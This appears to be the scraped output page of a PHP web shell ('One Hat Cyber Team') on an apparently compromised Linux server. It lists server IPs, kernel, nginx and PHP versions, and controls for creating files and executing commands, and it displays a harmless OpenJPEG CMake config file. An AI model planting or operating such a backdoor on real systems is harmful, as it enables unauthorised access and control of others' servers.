One Hat Cyber Team
Your IP :
3.15.5.27
Server IP :
104.21.32.1
Server :
Linux agrigation-prod 5.15.0-67-generic #74-Ubuntu SMP Wed Feb 22 14:14:39 UTC 2023 x86_64
Server Software :
nginx/1.24.0
PHP Version :
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
lib
/
x86_64-linux-gnu
/
openjpeg-2.1
/
View File Name :
OpenJPEGConfig.cmake
#----------------------------------------------------------------------------- # # OPENJPEGConfig.cmake - CMake configuration file for external projects. # # This file is configured by OPENJPEG and used by the UseOPENJPEG.cmake # module to load OPENJPEG's settings for an external project. # The OPENJPEG version number. set(OPENJPEG_MAJOR_VERSION "2") set(OPENJPEG_MINOR_VERSION "4") set(OPENJPEG_BUILD_VERSION "0") # The libraries. set(OPENJPEG_LIBRARIES "openjp2") # The CMake macros dir. set(OPENJPEG_CMAKE_DIR "lib/x86_64-linux-gnu/openjpeg-2.4") # The configuration options. set(OPENJPEG_BUILD_SHARED_LIBS "ON") # The "use" file. set(OPENJPEG_USE_FILE "") get_filename_component(SELF_DIR "${CMAKE_CURRENT_LIST_FILE}" PATH) if(EXISTS ${SELF_DIR}/OpenJPEGTargets.cmake) # This is an install tree include(${SELF_DIR}/OpenJPEGTargets.cmake) set(INC_DIR "/usr/include/openjpeg-2.4") get_filename_component(OPENJPEG_INCLUDE_DIRS "${INC_DIR}" ABSOLUTE) else() if(EXISTS ${SELF_DIR}/OpenJPEGExports.cmake) # This is a build tree set( OPENJPEG_INCLUDE_DIRS ) include(${SELF_DIR}/OpenJPEGExports.cmake) else() message(FATAL_ERROR "ooops") endif() endif() set(OPENJPEG_USE_FILE ${SELF_DIR}/UseOPENJPEG.cmake) # Backward compatible part: set(OPENJPEG_FOUND TRUE)